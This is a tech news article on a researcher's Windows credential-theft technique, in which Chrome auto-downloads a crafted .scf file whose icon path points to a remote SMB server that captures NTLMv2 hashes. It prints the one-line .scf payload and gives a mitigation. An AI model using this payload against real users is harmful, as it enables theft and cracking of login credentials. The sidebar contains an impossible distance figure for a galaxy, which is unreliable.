Skip to main content

Researcher Shows How To Hack Windows Login Details Using Google Chrome And SCF Files


windows-login-screen-password-hacking-google-chrome
By combining a flaw in the working of SMB networking protocol and Windows .scf files, a security researcher has come up with a unique Windows hacking method. Just by accessing the folder with a specially crafted .scf file, a user will end up sharing the computer credentials via Chrome and SMB protocol. The users are advised to disable the
automatic download feature in Google Chrome web browser. The researcher also expects that Google will soon address this issue.
SMB, or Server Message Blocks, is a network file sharing protocol that’s implemented in Microsoft Windows. Using SMB protocol, an application can access files at a remote server and resources like printers, mailslots, etc. Attacks on Windows operating system via SMB file sharing is an already known issue, but it’s limited to local area networks. In a new development, a security researcher has come up with such an attack using Google Chrome.
This attack on Windows operating system works by exploiting Chrome’s behavior of automatically downloading the files that it deems safe. Chrome downloads the files to a preset location and doesn’t ask for the same. Let’s suppose a malicious file is downloaded on the system. In that case, the user would need to interact with the file to perform malicious actions. What if there are files that don’t need any interaction for such actions?

.SCF file + SMB Protocol + Google Chrome

One such file type is Windows Explorer Shell Command File (.scf files). It supports some Windows Explorer commands like showing desktop or opening a Windows Explorer window. A .scf file, if stored on disk, retrieves an icon file when it’s loaded in a Windows Explorer window.
Serbian security researcher Bosko Stankovic of DefenseCode combined these two concepts of SMB protocol and .scf file to devise a new type of hacking attack.
A .scf file can be used to trick Windows into authenticating a remote SMB server. This is how the contents of file will look like:
[Shell] IconFile=\\170.170.170.170\icon
After a user downloads the file on system, it’s triggered as soon as download folder is opened to view the file. Please note that one doesn’t need to click/open this file; Windows File Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server which is set up by some notorious force. The server is ready to capture user’s username and NTLMv2 password hash, which can be cracked offline. The server can also be configured to relay this connection to some external service that needs such credentials.

Defeating Windows login credential theft

The security researcher advises the users to disable the automatic downloads in Google Chrome. To do so, one needs to open Show Advanced Settings in Settings. There, check the Ask where to save each file before downloading.
This change will force Google to ask for your permission before downloading a file. The researcher also hopes that Google Chrome will soon address this flaw.
Did you find this article on Windows hacking using Google Chrome, .SCF file, and SMB protocol useful? Don’t forget to share your views.

Comments

WHAT'S HOT

Fappening 2.0 Continues: Modern Family Actress Sarah Hyland Has Become The Latest Victim Of Notorious Hackers [Private Photos, Video Leaked]

Modern Family actress Sarah Hyland has become the latest victim of notorious hackers. Her private pictures and video have been posted online on infamous website Celeb Jihad. According to media sources, Sarah’s lawyers are planning to take legal action against the websites who choose to publish the leaked material. Meanwhile, the actual powers behind the leak are unknown.

Fedora 26 Released with Biggest Features - Download Here

Fedora 26 is the latest version of Fedora operating system. This version ships with the default GNOME 3.24 desktop environment andLinux kernel 4.11.8. Fedora 26 also marks the release of a new spin in the form of LXQt desktop edition. The other major change is the Fedora

Supermassive Black Holes Found Orbiting Each Other For The First Time

Image Credit: UCR Researchers from Stanford University have identified super-massive binary black holes at the center of Galaxy 0402+379 about 750 billion light years away. The two of the black holes are just 24 light years apart and one of them is orbiting the other. This is the first

Samsung Overtakes Fitbit In Wearable Sales For First Time

Fitbit has been a top competitor on the global wearable market for a long time, but the South Korea giant Samsung managed to steal the silver crown of the wearable market from Fitbit. According to Strategy Analytics, Samsung gained the